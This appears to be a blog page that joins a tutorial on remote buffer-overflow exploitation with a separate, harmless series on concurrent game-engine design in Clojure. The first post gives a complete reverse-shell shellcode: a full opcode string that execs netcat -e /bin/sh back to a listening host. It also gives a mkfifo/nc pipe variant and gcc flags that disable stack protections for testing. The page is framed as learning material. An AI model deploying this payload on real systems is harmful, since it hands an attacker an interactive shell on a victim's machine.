(def main :page)

Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds, what do you do? Well, for starters, you have to figure out how to exploit the vulnerability at hand. In this article I will talk only about buffer overflows abused to inject a shellcode and execute arbitrary commands. There can be other ways to gain access to a vulnerable remote machine, like incorrect parsing of cgi-bin requests, XSS attacks through unescaped html strings, SQL injection, etc etc.

Most of all, what I want to focus on is the remote nature of the attack. Local buffer overflows are easy and there are countless of other articles with detailed explanations on how to perform them (like this shameless self-plug from my old blog). Remote buffer overflows, though, are a whole other deal. Most of the time you are left stumbling in the dark trying to understand if an exploit is even possible, how the memory of your target machine could be laid out, if they have ASLR and stack guards… and on top of that you cannot just spawn a shell and call it a day. What good is it to just spawn a local shell on a remote machine, if you can’t log into it?

The reverse bind of a remote shell

There are several ways to obtain access to a local shell with a remote connection. The most common of all is to open a known port with a tcp socket and bind its stdout/stderr/stdin to a newly forked shell. This way we can connect from our computer with a simple netcat command. However, this doesn’t work well most of the time: most of the public-facing servers out there have only a few number of ports open to the outside world (like http(s), ftp, smtp, etc) and the remaining inbound requests are usually filtered and dropped by iptables or firewalls.

The solution to this is to use a reverse bind for your local shell. A reverse bind is a simple operation that turns the client into a server and vice-versa. Originally, you’d have opened a port on the target and waited for inbound connections (from your attacking machine). Reverse this and you’ll have an open connection on your own machine waiting for the target machine to connect, this turns the attacker into the receiver waiting for some poor victim to fall into the trap.

Now, there are several shellcodes around the web for this specific type of attack, you can freely browse some of them at the shell-storm database. To me, some of them worked and some others didn’t but it’s always a good learning experience so check it out. The topic for today will be how to abuse netcat to do most of the job for us, I looked around the shallow web (first results of google searches) and couldn’t find any example for this so… here it is!

The netcat -e command

We will assume our target has netcat installed on the machine. This is very specific for this type of attack and if the target is even a bit concerned about security, there probably won’t be any, but for the sake of learning let’s assume this attack is applicable.

Traditional netcat and its GNU counterpart have a special parameter that can be passed to the binary, the -e flag. This flag will execute anything and bind it to the connection. The traditional netcat also has a -c flag which, for our purposes, does exactly the same, but since GNU-netcat doesn’t have it, we’ll just use -e.

If we bind /bin/sh to netcat with -e, we are able to effectively pass our shell to the remote connection and have whoever is listening on the other side snoop into our machine (be careful when doing this!). Let’s give it a try:

  • In a shell on your machine run netcat -lvp 9999 to begin listening to inbound connections. This command should be your base operation for any reverse bind shell attack, it can be your life saver.
  • In a separate shell, run netcat -e /bin/sh 127.0.0.1 9999

You should have received a connection in the first shell you opened. Go ahead and type some shell commands like ls or whoami to confirm that it is working. You can close the connection (from any end) with Ctrl-c when you’re done with it.

Note: The openbsd version of the netcat command has no -e/-c flags. As an alternative (taken from their man page) you can execute the following command: rm -f /tmp/f; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 9999 > /tmp/f This, however, is very verbose, error prone and harder to run from an injected shellcode so if your target is using this version maybe it’s better to use a different shellcode.

Great! Now we know what command we want to execute on the target machine, we just need to find a way to cram it into some assembly and compile it into our payload.

The assembly code

This is the assembly required to run our shellcode. I will explain in details how it works. (Warning: it’s Intel syntax)

We want to execute the equivalent of the following C code: char *command[] = {"/bin/netcat", "-e", "/bin/sh", "127.127.127.127", "9999", NULL};
execve(command[0], command, NULL);

To do so, we set up the following command string: "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"

Ignoring the letters at the end (which I will explain later), you can see that our multiple strings are just being packed all together into a single one, separated with a # character. This is because we cannot have null characters inside the actual shellcode. If this were to happen, we’d end up with an incorrectly-parsed string from our victim’s machine. This is very common in shellcodes so I won’t get in too many details.

Regardless of where we are in memory when we run this code, we need to identify the address of the command string, so at line 1 we jump to the forward label (line 26) and then we immediately call the back label. The call instruction in assembly is used to call a function, what this does is push the return address (the address of the instruction right after the call) on top of the stack. But the address of the next instruction is exactly the address of our command string! (line 28)

Back to line 3, we pop the address into the esi register. Then we zero out the eax register (remember, we cannot just mov eax,0 because zeroes are not allowed in our code) and start performing a patching operation to split the command string into multiple individual strings directly in memory.

Here’s a picture to help explaining the following process: String in Memory

What we are doing between line 5 and line 9 is moving individual zeros (taken from the al/eax register, which we just zeroed with xor) into each location where an individual string in our command ends. This is effectively substituting # with \0. After that, we want an array of addresses to our strings (terminated with a NULL) to pass as second argument of execve(), this is where the leading string of repeating letters comes into play. In memory, arrays elements are stored in contiguous locations, so we can abuse this contiguous location of memory to store each address of each individual string.

At line 10 we move the address of /bin/netcat into AAAA, then we proceed from line 11 to line 18 to do the same for each piece of string. Importantly, at line 19 we store NULL (from eax) into FFFF to effectively terminate our array.

At line 20 we prepare the execve system call. Syscalls called with int 0x80 expect arguments to be inside the registers so we store 0xb(syscall number of execve) inside eax, esi(the address of “/bin/netcat”) inside ebx, our array of strings into ecx and then a NULL in edx. We then trigger the system call and if everything went according to plan, our shellcode should give us a nice reverse shell.

The devil is in the details

If you notice, the shellcode uses 127.127.127.127 as IP address and 9999 as port. I chose that IP because it’s a local IP (your own machine) with nice and even numbers. Usually you’ll want to replace that with your own machine’s public-facing IP, what you need to take care of is fixing all the offsets in the assembly code (as shown in the picture) if the length of your IP is different. This is often a bothersome and error-prone operation so be careful when re-building the shellcode, be sure to always test it locally to make sure it works.

Compiling and testing the shellcode

You should now have the assembly code stored in a file that we’ll call shell.asm. To compile it into binary/object code, we’ll use the following nasm command: nasm -felf32 -o shell.o shell.asm

We can inspect the binary with objdump -D and we’ll see our assembly code with the relative opcodes. We want to extract those opcodes and put them into a C string that we can execute from memory. There is a fancy one-liner script that can do that for us, taken from here:

for i in $(objdump -d shell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

This will print a string that looks like this: "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c
\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e
\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62
\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32
\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41
\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"

Now let’s create a small C program that can test our shellcode:

Let’s compile this, we’ll need to set the proper compilation flags to turn off security measures that would just make us segfault (they are usually enabled by default nowadays, rightfully so).

gcc shellcode.c -fno-stack-protector -z execstack -o shellcode

Spawn another shell with netcat -lvp 9999 and run ./shellcode. If all went well, you should have your reverse shell running and the exploit worked.

Shellcode worked

This is all for now, thank you for reading, happy hacking!

Cheers,
Morg.



<– Part 2

Time model in a concurrent game engine

“Everything changes and nothing remains still and you cannot step twice into the same stream” - Heraclitus

Every game has a world filled with entities. All those entities contain data that exists and mutates over time. The only way to read such data is to take a snapshot of the world, a photo of the current state of an entity, and then operate on it without caring about anything else. Unfortunately, most modern concurrent designs operate on the false assumption of mutual exclusion and the idea that critical sections need to be locked to prevent multiple accesses at the same time. Other paradigms use an actor-based model where messages are sent to a thread-safe interface that replies with the state in a thread-safe manner.

Both of these approaches, unfortunately, do not scale to large applications with hundreds (or thousands?) of concurrent accesses. What’s even worse is that the whole world slows down the more threads you add to the equation: when an actor spends time replying to dozens of requests, its thread’s timeslice becomes smaller and, on a soft-realtime constraint like a videogame, it can lead to funny and frustrating bugs. The same idea applies to locking and mutual exclusion: high contention of resources, especially with undefined hierarchies of locking mechanisms, can also cause deadlocks and stalemates.

Clojure

Enter Clojure, a possible solution to all these problems. Clojure is a Lisp dialect that runs on the JVM. There are also ports for CLR, Javascript (ClojureScript) and various other in-development implementations, but that is irrelevant to this post.

Clojure is built and designed from the ground up with a focus on concurrency and data immutability. Its time model is very peculiar compared to traditional paradigms. Thanks to its data persistence and immutability, it is (almost) always possible to read any variable in the program without incurring into blocking or inconsistent state. It also sports an impressive range of concurrent semantics (Refs, Vars, Agents and Atoms) which make parallel development trivial and straightforward.

This post is not for Clojure insight and design, however a superficial explanation of the Clojure concurrency magic is expected: the trick consists of separating identities and values. It really is that simple, especially when the whole environment is immutable and persistent. The only mutable things in Clojure (leaving out the Java-related libraries) are transients and the reference types already mentioned in the previous paragraph. Whenever a new variable is defined, it is paired with a value in the environment. A variable named foo whose assigned value is, let’s say, “bar” is not the same as the value “bar”. The identifier assigned with that variable is foo and it contains a value that is “bar”. If that variable is flagged as immutable, then, foo will always refer to “bar” in that context and nothing will change. We can now read foo from any thread without incurring in consistency problems because that defined value will never change for that identifier.

To allow stateful and mutable data while sticking to this principle, we just have to add a new layer of indirection. Clojure’s reference types are defined as an (identity, container) pair where the container itself is just a box that can mutate given a specific thread-safe function. Said function changes depending on which reference type is being used. Inside this mutable container there is immutable (and persistent) data which is the actual state/value of the variable. Changing what’s inside the container is always thread-safe through its concurrent semantic interface. Reading the value inside the container is called dereferencing and is always a constant-time operation that does not block or stop any other pending concurrent operation, relieving the system from the stress of having to send and receive messages to/from blackboxed actors. It is very similar to monads, but arguably easier to work with.

Test Here’s a shamelessly stolen explicative picture about the difference between mutable state and immutable identity, taken from this page which, admittedly, does a much more thorough and better job at explaining Clojure concurrency than I do.

Agents

Going back to game engine design, there is one reference type in Clojure that meets almost all the requirements for our entities: agents. An agent is a container that provides independent and asynchronous change of its state.

  • Independent - It does not care about other agents or reference types in the environment and operates only on its own internal data.
  • Asynchronous - It does not depend on operations carried to other agents or reference types in the environment, its succession of mutations in time is not related to other reference types. It is a fire-and-forget operation.

Agents operate on a similar approach to the actor model, but with a fundamental difference: the agent itself is data and it receives a function that transform that data. Unlike an actor model, where there’s a receive-message loop dispatching for various commands (even to read!), an agent simply reads from a queue of functions in its own separate thread and applies the function’s result to its own data.

To read a snapshot of the state of any agent in our game world, all we need to do is just dereference it. A constant-time operation that does not impact resource contention or interfere with other threads. To change an agent we just send a function that is applied to the agent’s state (like, for example, increasing the X,Y coordinates of a moving entity). Under the hood, the Clojure implementation makes sure this is all thread-safe. Without delving into too many implementation details: each agent gets a cut of a managed thread pool of N+2 threads (where N is the number of cores available in your CPU). Internally the thread pool is managed by the Java Executor Service given a specific scheduling algorithm (which can be modified for tweaking purposes).

What is specifically useful of agents is that the order of asynchronous functions is always coherent. If you send two functions in succession to an agent, you’re always guaranteed that the first function will be applied before the second one, in a FIFO manner.

Unfortunately, with this approach there is still one visible flaw that needs to be taken care of: what about coordinated updates between agents? More often than not in a game engine there are hierarchies of entities and sequences of updates that need to be fast and responsive. An example: if the player attacks an enemy, we want to tell the enemy to instantly play the hurt animation, without having to wait for that agent’s thread to be scheduled and updated god-knows-when, especially if the player needs to act differently depending on the response of the action (enemy is dead? enemy parried? enemy counter-attacked?). Luckily for us there is a solution for this issue and it will be outlined in the next post.

Morg.



<– Part 1 Part 3 –>

Design Theory

Before delving into actual implementation and technical details, let’s have a moment to reflect on the possible design of a fully parallel and concurrent game engine and what could be a simple development model for it.

We want to achieve the following goals:

  • Easy to understand
  • Easy to develop for
  • Entities are loosely coupled with each other
  • No need to think about threads

There are various paths that a developer can take in order to reach the state of a fully concurrent game engine, however I feel it is of the utmost importance to keep everything as simple as possible. It is no use if we can have a massive engine at the cost of nobody being able to understand it. It would eventually become frustrating and too hard to maintain, it would just lose in popularity and become yet another stigma in the history of multithreaded game development (I actualy love the Cell processor, don’t get me wrong).

Many people don’t fully realize it, but we live in a concurrent world. If we just look around, we can see a lot of tiny processors everywhere, they are called humans. How do they do it? How do they move around such a massively complex world without synchronizing with each other, without having to understand everything to take the next step in the ginormous computation of this universe?

If you think about it, the solution is actually very simple: they don’t. There is no need to schedule their life in time slices to share with everybody else, dictated by a globally synchronized clock. Imagine you are driving on a highway with dozens of cars in each lane. There are cars in front of you, cars behind you, cars at the sides. Traffic is a very complex system that is case of study for multiple researchers all over the world. Imagine that, we are a part of it! We, ourselves, are actually creating a vastly complex system and we don’t even realize it. And yet, what do we do while we drive? We just focus on the road. We have a target in mind, we don’t care about what happens around us, we only care about the cars directly in front and behind us (also the close surroundings, drive safely!). We don’t need to know that a few miles from us Fred is watching TV shows on his brand new 4K screen, why would that matter to us at all?

There is also another really important point to make: we cannot stop the world around us whenever we interact with it. We do not control the car behind us. You want to read that billboard? Welp, too fast, you could just glance at it once and now it’s gone. You don’t lock the world in place just for your own comfort. Imagine everybody locking everybody else, the whole system would grind to a halt, it would be unmanageable. Yet, this is exactly what a lot of multithreaded systems resort to: locking the world every time you interact with something is not the solution.

Let’s summarize this, there are two fundamental key points to remember:

  • Entities care only about themselves
  • The world must never stop running

The first point is not actually that hard to achieve, many game systems have been developed already with this in mind. Any classical Actor/Entity based system deals with entities being their own little world. There can be various grades of technical in-breeding for these engines, some may go with a fully compartmentized and heavily OOP driven approach while others prefer to go with data driven development, thinner and more spread out. Modern engines seem to be preferring the latter approach but the former certainly has its benefits too.

Towards a (not so) event-driven system

What we really want, though, is what people call an event-driven system. Traditionally in such systems, entities are blocks of code designed to respond to events and interact with the world via callbacks. This starts out as a very elegant model but, from my personal experience, it quickly becomes hard to maintain and operate (opinions may vary!). Did this event come from that entity or that other one? Which event was fired first? Should I reply to this event before or after the end of this update loop?

In my opinion, the problem behind an event-driven system is not being able to take it to the next level of abstraction. Developers are still tied to a classic update loop firing events at X frames per second. We need this because we need to provide a temporal ordering of actions in our game engine. We certainly don’t want our ball to pass through a brick simply because the “move” event was fired before the “collision” event in breakout. It would be disastrous. I have yet to see an accident being prevented because a car was able to pass unscathed through another one.

What we ultimately need is a way to provide asynchronous computation while maintaining the order of operations, we need to abstract away from the traditional timed update loop. Just provide these entities with the right behaviors and let them do their job, they surely know how to handle it better than we do, as long as the system is consistent.

For this purpose, we will now start referring to entities as agents, the reasoning behind this will be more clear in the next post.

Stop the world, I need to pee

The second point we need to consider is stopping the world. In a classic concurrent environment we need to make sure the shared data we are accessing from one thread is in a consistent state throughout the whole computation else problems could arise. This means that I need to prevent other threads from messing up with my data for the quantum of time I need to operate on it myself. This is called mutual exclusion. Let me get this straight to you: mutual exclusion is bad. It implies some privileged flow of execution that overtakes other threads and expects them to stop for it to continue. It is unreasonable, as I mentioned earlier. You should not expect traffic to slow down just because you want to take another look at the cutie waiting at the crossing light.

How do we implement this? How can I go mingle data in a fully concurrent environment without blocking others or fearing my data to suddenly become corrupt and unusable? There is a solution, and it is what I will be proposing in my next post.

Morg.



Part 2 –>

Introduction

Game engine development is a very interesting and complex subject for game developers. There is something incredibly appealing in trying to cram a highly modular, flexible and yet fast design into the quasi-realtime requirements of a game engine.

There is really so much you can do inside a tiny quantum of time, as tiny as 16.7ms for most requirements. Even when halving the framerate to ~33ms you’re still going to reach a limit to what you can do. There are a lot of ways to deal with timestepping and separation of rendering and updating and this is not the place to talk about it. What I want to talk about, however, is concurrency problems.

In 2013 (been a while, actually) processors have pretty much hit their physical limit as far as computational speed goes. Engineers have been coming up with the most convoluted solutions in order to cram even more juices out of a small die, but the common trend is to go with more cores. If you cannot get a single core to run faster, why not just double it? Double the cores means double the performance! (It’s not actually true) The line of reasoning is sound, though: with more cores your machine can handle more threads, which are parallel flows of execution, gaining more performance out of parallelism.

How game development relates to multiple cores, though, is a totally different story. A lot of cores mean you can run a lot of applications at the same time in a better way than you’d do with just a single core and as long as each application lives in its own world, and doesn’t require interaction with the others, you should expect good speedups in performance. As any game developer can attest, this is not the case for game engines. A videogame is a very complex system composed with a high number of entities all operating together, synchronized and aware of the world, requiring a single timestep and multiple computations to be applied to more than one entity at the same time. This is nightmare for multithreading.

I won’t go into details about issues with multithreading, but it is important to realize that the fundamental problem with highly synchronized multithreaded systems is the state. The moment two threads try to access the same shared resource at the same time, the consistency of the state of said resource is at risk and this should always be kept in mind when designing a multithreaded game engine. Another substantial problem has to do with the update rate of entities. One entity should not be allowed to be faster than the others, it should not “get ahead” of the group, and with concurrency in the mix you really need to do a lot of over engineering to solve this issue, up to the point of losing performance because of it.

On the one hand, concurrent game engines seem impossible to achieve, however on the other hand there are various portions that can be safely parallelized without incurring in the wrath of the Nondeterministic Gods. Modern AAA engines (like the Unreal Engine or the Doom3 Engine) already separate some portions of their code in different threads. The most common approaches involve having the rendering, physics, input/networking and AI all on their own threads, and then successively synchronized update cycles to the whole game world.

How to further parallelize the job of a game engine is still a very hot topic of research in the game industry with, unfortunately, little to no actual solution readily available to the public. Wouldn’t it be great to just be able to develop a game with little to no concern about the underlying multithreaded architecture or CPU structure while still gaining performance boosts from multiple cores?

With this series of blog posts I am going to provide a rationale and design concretization of my game engine idea, the Cloister Core engine. It is a fully concurrent game engine I am currently developing alongside these blog posts. I don’t know where this journey will take me and if this is a sensible design, however I think it’s going to be fun nonetheless.

Morg.